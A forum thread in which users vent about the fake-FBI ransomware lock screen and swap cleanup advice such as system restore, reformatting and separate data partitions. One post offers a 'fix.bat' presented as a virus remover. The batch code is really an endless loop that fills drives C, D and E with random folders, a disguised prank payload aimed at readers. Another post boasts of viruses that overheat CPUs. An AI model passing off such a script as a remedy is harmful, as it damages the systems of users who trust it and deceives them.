I haven't been on in a week because of that STUPID virus. If you've never heard of it, you should google it. Luckily the one I had didn't hide all of my files and foldersill. My PC is still acting funny, so I guess now Its time for a full reinstall since I've gotten off all of my pictures and video I wanted to keep. Fuck that virus. FUCK YOU.

lol, my gf got that one one time awhile back.. it wasn't a computer killing virus though as she was somehow able to get around it and manage to get rid of it with some spyware ..
that's the one that says you downloaded kiddy porn and now have been reported to the fbi or some crap like that, no??

i just said this in another thread the other day, but i'd love to find w/e jerk wads make virus' and smash them over their head(s) with my infected computer(s).. :(
 
don't forget to do a low level format or just trash the drive and get a new one. my shit is long overdue for a nice cleaning.
 
CP was listed as one of the possibilities as to why my computer was being locked. The DUMB fucks who made this virus/maleware didn't even spell -F.B.I.- right. It was- FBI.- So fake. My GF called me at work and was tripping balls. LOL. As soon as she described it to me, I knew the deal. I had read of it before on bleepingcomputer.com

In college a few computer nerd friends of mine and I would experiment with viruses that would overclock CPU's in "unsuspecting" computers until they literally smoked up and fried. You can literally fry your computer. I know. I've done it.
 
I got that virus last year. what passed through a virus program, nortan, bus shut............... and ways. what I doooo . is I run system restore, to the original date the pc was made. I do this from time to time. because I know virus protection is a total joke. now. do this like every 6 months, your pc will fly fast,
 
fixing this one is an easy one.

go into notepad and paste this:

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM errorcode401.blogspot.in



then save it as "fix.bat" make sure it ends in .bat.

open it up and it will scan and erase the virus.

I tried this and it didn't work. When I click on the browser icon thing I still get this weird window that comes up with pictures and text and stuff that aren't mine. I keep all my pictures and stuff in My Documents, but these pictures look like they are in my msdn.com folder. But when I look for my msdn.com folder I can't find unless I click on the browser icon. I am so confused.

Works like a charm. I hit my computer with a bat just like you said and the virus is gone.

ha ha.. The first rule in "computer bad`ass 101", always backup your shit on a different drive. I use dvd burned ect. The best way to isolate computer safety is to do a full reformat, "ZERO ALL DATA", and reinstall. When you reinstall, make a +50gb partition called "C', and the rest of the drive to partition "D". Install the operating system on drive "C:" and the data you want to save on drive "D:". It is easy to scan the drive D data and reformat drive C. lose nothing but about 3-4 hours of time. I do a full reformat every 3 months. It IS GOD! ;)
